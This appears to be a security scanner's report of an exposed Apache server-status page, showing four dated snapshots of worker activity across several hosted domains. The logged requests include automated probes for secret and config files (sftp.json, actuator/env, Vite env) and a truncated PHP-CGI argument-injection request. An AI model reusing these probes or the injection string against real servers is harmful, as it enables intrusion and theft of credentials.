Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 29-Dec-2025 23:06:50 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 87 Parent Server MPM Generation: 86 Server uptime: 16 days 16 hours 2 minutes 44 seconds Server load: 0.29 0.17 0.22 Total accesses: 433781 - Total Traffic: 13.6 GB - Total Duration: 420123640 CPU Usage: u35.76 s48.47 cu2522.26 cs1625.97 - .294% CPU load .301 requests/sec - 9.9 kB/second - 32.8 kB/request - 968.516 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01696051no0yes010000 11696184no0yes19000 21696050no0yes010000 31696049no2yes010001 41696052no0yes010000 Sum502 149001 ___________W______________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8616960510/3/9806_ 0.0242052219140.00.01327.26 139.59.136.184http/1.1relehse.com:80GET /config.json HTTP/1.1 0-8616960510/1/10313_ 0.00391758916000.00.01308.66 138.197.191.87http/1.1relehse.com:443GET / HTTP/1.1 0-8616960510/1/9909_ 0.044089002600.00.00301.05 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-8616960510/1/10074_ 0.043060509010.00.00288.16 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-8616960510/1/9835_ 0.0122751985630.00.00236.80 138.197.191.87http/1.1relehse.com:443GET /api-docs/swagger.json HTTP/1.1 0-8616960510/2/10092_ 0.042091006990.00.00286.90 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-8616960510/1/9935_ 0.021065238750.00.00390.55 139.59.136.184http/1.1relehse.com:80GET /v2/_catalog HTTP/1.1 0-8616960510/2/10238_ 0.0250053748710.00.01269.14 188.166.108.93http/1.1relehse.com:443GET /server-status HTTP/1.1 0-8616960510/1/9813_ 0.001099102440.00.00413.60 139.59.136.184http/1.1relehse.com:80POST /api/gql HTTP/1.1 0-8616960510/0/10034_ 0.0047058612070.00.00309.50 27.115.124.109h2relehse.com:443idle, streams: 0/33/33/0/2 (open/recv/resp/push/rst) 1-8616961840/11/7834_ 0.154039338530.00.03293.03 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-8616961840/8/7863W 0.100046615350.00.02204.50 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-8616961840/11/7747_ 0.160057588290.00.03290.14 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /login.action HTTP/1.1 1-8616961840/13/7633_ 0.164041278140.00.02159.76 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-8616961840/12/7920_ 0.163048466230.00.04227.35 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-8616961840/15/7749_ 0.166055734770.00.04243.99 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-8616961840/13/7700_ 0.1610166133740.00.02203.60 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-8616961840/13/7776_ 0.153050493930.00.03216.88 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-8616961840/7/7667_ 0.1033682552140.00.02286.75 138.197.191.87http/1.1relehse.com:443GET /telescope/requests HTTP/1.1 1-8616961840/10/7913_ 0.154051003190.00.02173.72 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-8616960500/2/7930_ 0.0310044229620.00.01326.51 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-8616960500/0/7941_ 0.00230863741970.00.00298.68 173.244.49.43http/1.1 2-8616960500/0/8000_ 0.009048024950.00.00250.11 172.68.234.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-8616960500/1/7979_ 0.0039096634570.00.00221.78 139.59.136.184http/1.17f7ffb32-1f6e-4d16-bdaa-07377bc\x16\x03\x01\x05\xda\x01 2-8616960500/1/8035_ 0.0170050361270.00.00302.06 188.166.108.93http/1.1relehse.com:443POST /api/gql HTTP/1.1 2-8616960500/1/8041_ 0.0223041102260.00.00285.20 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-8616960500/0/8018_ 0.00707059371230.00.00320.41 5.78.82.37http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 2-8616960500/2/8012_ 0.0311047559580.00.01260.16 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 2-8616960500/1/7819_ 0.01413146400030.00.00306.60 138.197.191.87http/1.1relehse.com:443GET /config.json HTTP/1.1 2-8616960500/0/8152_ 0.0010053689410.00.00280.87 162.159.122.54h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8616960490/13/9078_ 0.171056336040.00.03277.61 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-8616960490/11/8930_ 0.115070734550.00.06284.89 188.166.108.93http/1.1relehse.com:443GET /config.json HTTP/1.1 3-8616960490/11/8786_ 0.1720137343520.00.02338.44 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-8616960490/9/8953_ 0.1012960714220.00.03274.02 138.197.191.87http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8616960490/7/9214_ 0.151059281960.00.03304.17 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-8616960490/8/8769_ 0.161057456000.00.02270.21 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8616960490/13/8991_ 0.1750184510490.00.02257.86 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-8616960490/12/9159_ 0.17685669340300.00.05402.70 172.68.22.84h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-8616960490/13/9066_ 0.152061752910.00.04310.70 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/index.html HTTP/1.1 3-8616960490/13/8972_ 0.151053365300.00.03273.95 207.154.212.47http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-8616960520/1/8658_ 0.006416179136150.00.01311.29 103.4.250.150http/1.1relehse.com:443GET / HTTP/1.1 4-8616960520/2/8351_ 0.027066395570.00.01217.10 64.225.75.246http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-8616960520/0/8585_ 0.004083423990.00.00284.05 23.178.112.106http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.well-known/acme-challenge/_5xUW8mVkyf2vVTvnJDTNh6T-4wYeV_ 4-8616960520/1/8713_ 0.00703163832180.00.00287.57 138.197.191.87http/1.1relehse.com:443POST /api/gql HTTP/1.1 4-8616960520/0/8567_ 0.0070051483030.00.00279.41 13.49.227.2http/1.1relehse.com:80GET /.well-known/acme-challenge/uvA613fWj149NPtNoG-opDekNiGLwBv 4-8616960520/1/8529_ 0.00701445480240.00.00207.95 103.4.250.150http/1.1relehse.com:443GET /login HTTP/1.1 4-8616960520/1/8720<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3733d72ba
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 27-Dec-2025 07:28:40 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 68 Parent Server MPM Generation: 67 Server uptime: 14 days 24 minutes 34 seconds Server load: 0.18 0.08 0.08 Total accesses: 376254 - Total Traffic: 12.0 GB - Total Duration: 378177262 CPU Usage: u40.17 s48.34 cu2163.04 cs1368.73 - .299% CPU load .311 requests/sec - 10.4 kB/second - 33.4 kB/request - 1005.11 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01426941no2yes28001 11426942no0yes010000 21426940no0yes010000 31426939no0yes010000 41427073no0yes010000 Sum502 248001 __C__W____________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-6714269410/92/8644_ 5.281227237991860.01.06299.99 162.158.123.205h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6714269410/94/9117_ 5.147048903240.01.75288.65 165.22.31.165http/1.1relehse.com:443POST / HTTP/1.1 0-6714269410/79/8594C 5.2013076928610.01.44270.73 108.162.246.211h2tandemsl.com:443done, streams: 0/2/1/0/1 (open/recv/resp/push/rst) 0-6714269410/81/8860_ 5.2743942474220.01.19261.34 172.68.135.168h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6714269410/82/8611_ 5.2311039837560.01.49208.97 172.68.135.168h2tandemsl.com:443idle, streams: 0/2/1/0/1 (open/recv/resp/push/rst) 0-6714269410/89/8869W 5.270086459720.00.64256.63 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-6714269410/84/8675_ 5.287044877520.00.95362.07 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-6714269410/84/9016_ 5.267050343820.01.11243.30 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6714269410/93/8621_ 5.277095405690.00.91369.40 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-6714269410/92/8824_ 5.197102540448590.02.31269.42 172.70.219.46h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/3/6497_ 1.992119031673400.00.00254.12 172.69.68.186h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/2/6438_ 1.89211977738310000.00.00175.99 172.70.174.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/3/6357_ 1.912115181646511300.00.06210.08 172.70.174.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/0/6269_ 0.002115034279130.00.00123.98 172.70.224.188h2tandemsl.com:443done, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 1-6714269420/0/6544_ 0.002115039471550.00.00202.92 172.70.224.188h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/1/6370_ 0.52211513844386280.00.03194.65 209.97.180.8http/1.1barrerasdecontencion.com:443POST /graphql/api HTTP/1.1 1-6714269420/1/6326_ 1.9921144153907820.00.03176.30 172.70.216.14h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/2/6427_ 1.792114542895530.00.07193.28 162.158.28.175h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/2/6332_ 1.992120069555000.00.01229.02 172.69.68.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-6714269420/2/6534_ 1.722120043963920.00.00144.89 172.71.184.89h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/4/7194_ 2.49143744841762570.00.09307.94 172.71.184.91h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/0/7155_ 0.00144937860581320.00.00266.31 172.68.135.151h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/4/7267_ 2.391449044629360.00.00232.73 104.22.10.193h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/4/7251_ 2.031454092069630.00.03206.85 162.158.28.222h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/8/7243_ 2.48474045180480.00.07289.34 162.158.90.227h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/2/7336_ 2.1447483737972260.00.02270.01 172.70.174.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/3/7244_ 2.231432054665100.00.03293.40 172.69.9.100h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/6/7275_ 2.8447991444210110.00.14227.77 172.70.46.117h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/2/7097_ 1.941432541700690.00.01294.30 172.68.10.47h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-6714269400/3/7391_ 1.941432150374290.00.03227.95 172.71.184.44h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/3/8807_ 2.5013863953995420.00.03272.15 162.158.123.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/3/8651_ 2.211381167583880.00.02263.07 172.71.114.218h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/4/8510_ 2.351764243133122310.00.04308.88 172.68.183.51h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/6/8694_ 2.211381059869900.00.04270.27 188.114.102.244h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/7/8921_ 2.211583058283130.00.01299.85 188.114.102.80h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6714269390/7/8493_ 2.36176376456145450.00.01256.34 172.68.183.51h2lcftech.es:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6714269390/5/8711_ 1.9115830183400690.00.12251.12 172.71.184.179h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/3/8879_ 1.911758061119640.00.00383.35 172.71.184.46h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-6714269390/3/8791_ 2.221758057782070.00.00306.62 172.69.9.80h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-6714269390/5/8703_ 2.43158859150737970.00.04258.25 104.23.166.148h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-6714270730/71/6452_ 5.4210170199310.01.11255.53 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 4-6714270730/61/6285_ 5.433048255920.01.27169.64 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-6714270730/69/6469_ 5.432066269560.01.19219.00 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 4-6714270730/58/6532_ 5.412049427270.01.59245.09 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 4-6714270730/62/6509_ 5.421042840500.01.07182.06 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 4-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e3f69c9a0e
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 25-Dec-2025 05:10:23 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 58 Parent Server MPM Generation: 57 Server uptime: 11 days 22 hours 6 minutes 17 seconds Server load: 0.24 0.14 0.10 Total accesses: 340920 - Total Traffic: 11.1 GB - Total Duration: 354395166 CPU Usage: u61.42 s64.57 cu1911.59 cs1161.72 - .311% CPU load .331 requests/sec - 11.3 kB/second - 34.3 kB/request - 1039.53 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01171907no0yes010000 11171777no1yes19000 21171775no0yes010000 31171776no0yes010000 41171774no2yes010001 Sum503 149001 ______________W___________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5711719070/22/7301_ 7.5150968833533880.01.34273.79 143.110.213.72http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/27/7744_ 10.331706039129620.01.43245.83 172.71.203.87h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/33/7257_ 10.84147071199570.01.05235.11 103.210.22.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /robots.txt HTTP/1.1 0-5711719070/31/7493_ 9.221701037731100.00.68203.96 172.71.146.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/22/7260_ 8.98509143533429000.00.35175.89 162.158.79.50h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/14/7497_ 9.18118475610250.00.89209.82 108.162.245.185h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/21/7304_ 7.695091037648100.00.83330.21 172.69.166.23h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/21/7664_ 7.055095134860880.00.21213.96 162.158.122.3h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/21/7266_ 8.99170635234733680.00.48318.00 104.23.209.220h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5711719070/24/7466_ 7.061701036084180.00.68240.73 162.158.120.142h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/193/5851_ 16.533030365410.03.93243.46 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-5711717770/189/5778_ 16.521036841480.05.62165.19 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-5711717770/199/5679_ 16.531044631050.04.06189.24 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-5711717770/187/5623_ 16.535032881400.04.50115.30 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5711717770/205/5874W 16.380037570460.02.95181.59 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-5711717770/191/5709_ 16.512042848540.02.98182.72 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 1-5711717770/184/5661_ 16.5300152322440.03.92163.32 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-5711717770/202/5750_ 16.4434141297900.02.99180.77 188.114.111.103h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5711717770/181/5660_ 16.532067977920.05.45218.81 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-5711717770/187/5878_ 16.5116942417930.04.07135.82 188.114.111.103h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/3/6261_ 7.18631139448000.00.00295.05 104.23.175.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/10/6246_ 8.746380853182880.00.86245.92 108.162.245.27h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/5/6344_ 7.256333931593650.00.14216.54 188.114.111.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/10/6320_ 10.29638087927190.00.06187.70 172.68.18.111h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/11/6281_ 9.9763392137715140.00.12263.05 172.71.146.50h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/2/6412_ 10.29636035659490.00.00241.12 172.69.11.246h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/2/6328_ 2.74633032468040.00.00277.78 172.68.7.202h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/11/6368_ 10.29638041469340.00.26208.68 172.69.138.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/6/6198_ 6.60638039423320.00.03279.75 162.158.122.58h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5711717750/5/6493_ 8.416313440616510.00.06203.89 172.64.200.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/4/8604_ 7.205199053335420.00.03268.35 172.64.217.162h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/4/8436_ 8.285096267007790.00.00259.80 108.162.245.14h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/8/8328_ 7.98509616132527520.00.05305.47 172.64.200.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/9/8488_ 7.9850911759262360.00.13265.80 172.64.200.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/7/8739_ 8.285091057287750.00.14295.07 108.162.245.14h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-5711717760/5/8307_ 6.28519970155446690.00.12251.60 3.237.173.220http/1.1done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 3-5711717760/9/8530_ 8.3250960182665150.00.09246.40 172.71.150.53h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/4/8684_ 8.325102060424020.00.09367.27 172.71.147.129h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/5/8601_ 6.265102057102730.00.05290.52 162.158.122.133h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5711717760/11/8506_ 8.05509734749955060.00.14246.77 172.70.189.26h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5711717740/289/6045_ 19.8340169138520.05.05248.20 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5711717740/287/5881_ 19.8511047212950.05.19162.11 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-5711717740/293/6081_ 19.7313065165130.06.25213.20 103.210.22.74http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /favicon.ico HTTP/1.1 4-5711717740/292/6094_ 19.8212048202590.023.41237.21 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 4-5711717740/291/6110_ 19.856041665160.05.11161.29 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31548070e3548070e382d2ddb4
Apache Status Apache Server Status for 7f7ffb32-1f6e-4d16-bdaa-07377bcfaade.clouding.host (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 23-Dec-2025 02:02:06 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 48 Parent Server MPM Generation: 47 Server uptime: 9 days 18 hours 58 minutes Server load: 0.02 0.07 0.09 Total accesses: 271977 - Total Traffic: 9.2 GB - Total Duration: 202083259 CPU Usage: u88.33 s70.86 cu1512.17 cs931.2 - .308% CPU load .322 requests/sec - 11.4 kB/second - 35.6 kB/request - 743.016 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0968394no2yes19000 1968525no0yes010000 2968393no0yes010000 3968398no1yes010000 4968392no0yes010000 Sum503 149000 _________W________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-479683940/576/5816_ 33.187027259260.014.00242.79 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 0-479683940/590/6233_ 33.192033581290.010.29194.22 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-479683940/529/5794_ 33.193064874600.012.97199.91 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-479683940/549/5982_ 33.184030497240.06.81176.50 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 0-479683940/542/5743_ 33.197027387330.012.57130.01 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-479683940/556/6001_ 32.9472468810240.016.01185.46 212.170.119.244h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-479683940/547/5834_ 33.12136530483060.041.54298.29 172.71.99.154h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-479683940/552/6125_ 33.1921927863090.016.08178.33 162.158.122.177h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-479683940/544/5767_ 33.167027767680.015.82292.47 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 0-479683940/562/5954W 33.180029248320.015.59193.21 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-479685250/392/4997_ 27.846636021528920.027.15226.06 104.23.239.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/336/4930_ 27.236345023179890.05.29130.42 172.70.83.42h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/385/4841_ 27.84124020581300.011.42173.95 172.70.240.38h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/386/4814_ 27.04481519717849320.07.3296.16 172.69.70.85h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/355/4999_ 28.31635022023536710.012.66164.27 104.23.225.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/371/4880_ 27.6648152025522640.013.94167.96 212.170.119.244h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-479685250/381/4825_ 30.281240141559960.08.08124.35 157.245.204.205http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 1-479685250/372/4893_ 27.03482036730783580.04.36161.62 103.23.60.244http/1.1 1-479685250/387/4846_ 